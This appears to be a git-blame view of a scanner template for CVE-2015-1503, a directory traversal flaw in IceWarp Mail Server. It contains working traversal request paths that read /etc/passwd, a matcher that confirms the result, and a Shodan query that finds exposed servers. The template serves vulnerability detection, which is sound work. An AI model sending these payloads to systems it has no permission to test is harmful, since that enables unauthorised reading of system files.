2021-11-24 13:31:51 +00:00
|
|
|
id: CVE-2015-1503
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-11-24 13:31:51 +00:00
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: IceWarp Mail Server <11.1.1 - Directory Traversal
|
2021-11-24 13:31:51 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
|
|
|
description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability.
|
2021-11-24 13:31:51 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
|
2021-12-02 07:18:57 +00:00
|
|
|
- http://www.icewarp.com
|
2021-11-24 13:31:51 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1503
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
|
2021-11-24 13:31:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2015-1503
|
2023-07-11 19:49:27 +00:00
|
|
|
cwe-id: CWE-22
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.94041
|
|
|
|
epss-percentile: 0.98821
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
|
2022-07-10 09:37:40 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: icewarp
|
|
|
|
product: mail_server
|
2023-09-06 13:22:34 +00:00
|
|
|
shodan-query: title:"icewarp"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: lfi,mail,packetstorm,cve,cve2015,icewarp
|
2021-11-24 13:31:51 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-24 13:31:51 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
|
|
|
|
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|